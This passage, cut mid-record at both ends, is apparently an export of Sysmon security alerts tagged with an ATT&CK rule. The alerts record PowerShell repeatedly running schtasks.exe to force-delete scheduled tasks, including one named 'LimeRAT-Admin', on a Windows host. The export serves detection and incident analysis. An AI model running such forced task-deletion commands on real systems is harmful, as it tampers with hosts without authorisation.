Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.483",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.322 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010b3292f00} +ProcessId: 7076 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.331099200Z"",""eventRecordID"":""3588"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.322\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010b3292f00}\r\nProcessId: 7076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.322"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010b3292f00}"",""processId"":""7076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.469",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.247 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010ec272f00} +ProcessId: 5688 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.263397900Z"",""eventRecordID"":""3587"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.247\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-0010ec272f00}\r\nProcessId: 5688\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.247"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-0010ec272f00}"",""processId"":""5688"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.438",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.189 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00102f262f00} +ProcessId: 1124 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.220235500Z"",""eventRecordID"":""3586"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.189\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00102f262f00}\r\nProcessId: 1124\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:10.189"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-00102f262f00}"",""processId"":""1124"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.409",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.117 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103e242f00} +ProcessId: 5044 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN HispDemorn /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.145187900Z"",""eventRecordID"":""3585"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.117\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-00103e242f00}\r\nProcessId: 5044\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN HispDemorn /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.117"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-00103e242f00}"",""processId"":""5044"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN HispDemorn /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.395",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.087 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001068222f00} +ProcessId: 6204 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN werclpsyport /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.091051500Z"",""eventRecordID"":""3584"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.087\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001068222f00}\r\nProcessId: 6204\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN werclpsyport /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: 
Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.087"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-001068222f00}"",""processId"":""6204"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN werclpsyport /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:38.366",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:10.049 +ProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001076202f00} +ProcessId: 1520 +Image: 
C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN TablteInputout /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:10.052315100Z"",""eventRecordID"":""3583"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:10.049\r\nProcessGuid: {df9fc3d3-b3fa-5ecf-0000-001076202f00}\r\nProcessId: 1520\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN TablteInputout /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:10.049"",""processGuid"":""{df9fc3d3-b3fa-5ecf-0000-001076202f00}"",""processId"":""1520"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN TablteInputout /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
